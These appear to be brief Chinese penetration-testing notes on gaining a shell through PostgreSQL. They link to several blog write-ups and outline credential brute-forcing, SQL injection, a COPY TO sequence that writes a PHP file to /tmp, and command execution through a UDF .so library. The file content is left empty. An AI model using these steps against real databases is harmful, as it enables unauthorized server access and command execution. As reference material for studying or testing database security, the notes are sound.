(168条消息) 利用postgresql getshell_yusec的博客-CSDN博客

PostgreSQL弱口令getshell - renblog - 博客园 (cnblogs.com)

渗透中利用postgresql getshell | CN-SEC 中文网

postgreSQL数据库渗透思路

1.postgreSQL数据库暴力猜解
猜解成功后可进行的操作
- 可对数据库进行操作（增、删、改、查）
- 可通过数据库函数执行系统命令
2.postgreSQL注入

getshell-1

drop table pwn;
create table pwn (t TEXT);
insert into pwn(t) values ('');
select * from pwn;
copy pwn(t) to  '/tmp/cmd.php';
drop table pwn;
//使用数据库写文件
copy  (select '') to '/tmp/1.php';

getshell-2 

使用数据库执行系统命令
执行系统命令需要用到udf库，(这个有点类似mysql 提权)

创建.so,执行自己需要用的命令

(168条消息) PostgreSQL入门及提权_weixin_34075268的博客-CSDN博客